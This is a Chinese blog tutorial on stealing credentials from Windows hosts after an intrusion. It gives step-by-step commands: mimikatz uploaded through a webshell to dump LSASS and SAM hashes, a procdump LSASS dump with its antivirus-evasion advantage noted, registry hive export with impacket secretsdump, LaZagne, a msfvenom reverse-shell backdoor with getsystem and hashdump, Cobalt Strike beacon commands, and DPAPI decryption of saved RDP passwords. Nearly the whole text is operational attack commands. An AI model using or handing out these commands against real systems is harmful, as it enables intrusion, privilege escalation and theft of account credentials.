渗透测试——工作组内网凭证获取

目录

方法一

Mimikatz猕猴桃工具

下载

 使用webshell工具进行内网连接rce

mimikatz.exe文件通过蚁剑上传到内网主机

​编辑

蚁剑打开终端 

获取方法

 (一)非交互试命令一

 点击刷新=>出现生成的log.txt文件

双击点击log.txt查看获取的信息(成功获取)

(二)非交互式获取命令二

 获取NTLM HASH

方法二

Procdump+mimikatz获取

下载

 上传蚁剑

 命令执行

 刷新,出现新文件

 下载到自己物理机的mimikatz目录文件夹下

 使用mimikatz解密

 注册表导出HASH

命令(依此输入命令)

 同样下载文件到mimikatz目录里面

mimikatz解密

 impacket解密

下载

方法三

LaZagne工具获取

 下载

执行命令,获取所有密码

 方法四

meterpreter获取hash

kali机生成reverver_tcp的后门

kali机开启监听

 运行10000.exe

 成功上线目标靶机

 提权

 mimikatz插件读取hash

方法五

cs工具获取hash

其他密码凭证获取

RDP密码获取

查看本地机器本地连接过的目标机器

 查看本地用户此目录下是否存有RDP密码文件

​编辑 查看保存在本地的远程主机信息

 利用命令获取guidMasterKey的值

获取guidMasterKey对应的masterKey

​编辑

 Mysql密码的获取

user.MYD文件

 01二进制工具读取​编辑

工具SharpDecryptPwd.exe


方法一

Mimikatz猕猴桃工具

下载

Releases · gentilkiwi/mimikatz · GitHubicon-default.png?t=N7T8https://github.com/gentilkiwi/mimikatz/releases

下载后自行解压

 使用webshell工具进行内网连接rce

mimikatz.exe文件通过蚁剑上传到内网主机

蚁剑打开终端 

获取方法

 (一)非交互试命令一
二选一,都可以
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > log.txt

mimikatz.exe "log re.txt" "privilege::debug" "sekurlsa::logonpasswords" "exit"

 点击刷新=>出现生成的log.txt文件

双击点击log.txt查看获取的信息(成功获取)
一般情况下高版本的windows取消了lsass.exe缓存密码,是不会直接暴露密码的

(二)非交互式获取命令二
获取NTLM_HASH
mimikatz.exe "privilege::debug" "log 2.txt" "token::elevate" "lsadump::sam" "exit"
 获取NTLM HASH

 

方法二

Procdump+mimikatz获取

有优势procdump为微软开发的软件,一般不会被杀,有免杀姿态优势

下载

ProcDump - Sysinternals | Microsoft Learnicon-default.png?t=N7T8https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump

 上传蚁剑

 命令执行

For 32bits:
procdump.exe -accepteula -ma lsass.exe lsass.dmp

For 64bits:
procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp

 

 刷新,出现新文件

 

 下载到自己物理机的mimikatz目录文件夹下

 使用mimikatz解密

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" "exit"
密码和NTLM暴露

 注册表导出HASH

命令(依此输入命令)

reg save HKLM\SYSTEM system.hiv
reg save HKLM\SAM sam.hiv
reg save HKLM\SECURITY security.hiv

 

 

 同样下载文件到mimikatz目录里面

mimikatz解密
mimikatz.exe  "lsadump::sam /system:system.hiv /sam:sam.hiv" "exit"

 解密成功

 impacket解密
下载

Releases · fortra/impacket · GitHubicon-default.png?t=N7T8https://github.com/fortra/impacket/releases

复制这个py文件到mimikatz目录下,然后运行下面那个命令

python3 secretsdump.py -sam sam.hiv -security security.hiv -system system.hiv LOCAL

解密成功

方法三

LaZagne工具获取

 下载

Releases · AlessandroZ/LaZagne (github.com)icon-default.png?t=N7T8https://github.com/AlessandroZ/LaZagne/releases/

 版本自行下载

 工具上传到目标靶机

执行命令,获取所有密码

 方法四

meterpreter获取hash

kali机生成reverver_tcp的后门

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.20.128 lport=10000 -f exe -o 10000.exe

后门放到目标主机上 

kali机开启监听

handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.20.128 -P 10000

 运行10000.exe

start 10000.exe

 成功上线目标靶机

shell命令进入后,whoami /all看看是不是管理员权限,由于meterperter只认system用户,getuid得到下面这个用户权限不够

 提权

成功提权system用户

getsystem

hashdump   #读取hash

 mimikatz插件读取hash

help查看插件命令使用说明

creds_all

方法五

cs工具获取hash

beacon> hashdump

beacon> logonpasswords
beacon> mimikatz sekurlsa::logonpasswords

beacon> mimikatz lsadump::sam

其他密码凭证获取

RDP密码获取

查看本地机器本地连接过的目标机器

reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s

 查看本地用户此目录下是否存有RDP密码文件

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

 查看保存在本地的远程主机信息

cmdkey /list

 利用命令获取guidMasterKey的值

mimikatz.exe "privilege::debug" "dpapi::cred /in:文件路径" "exit"
以我为例命令
mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\E0336123F6E8FA63985517101A08FD7B" "exit"

获取guidMasterKey对应的masterKey

mimikatz.exe "privilege::debug" "sekurlsa::dpapi" "exit"

mimikatz.exe "privilege::debug" "dpapi::cred /in:要获取的文件路径 (有一个空格)/masterKey:你获取的masterKey" "exit"

#如下有个空格
mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\E0336123F6E8FA63985517101A08FD7B /masterKey:你获取的masterKey" "exit"
mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\E0336123F6E8FA63985517101A08FD7B /masterKey:6111e0ed3e84f3073a741f56f7c7131ad04150e922e7a16e208178b225bd48be3c8953a5adac43218c9fcd5ac0f4f3e3ccfab34c3f2ff52787a8b9e379dd63f1" "exit"

 Mysql密码的获取

user.MYD文件

 01二进制工具读取

工具SharpDecryptPwd.exe

SharpDecryptPwd.exe #查看命令帮助

  • 24
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

peiqi_crazy

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值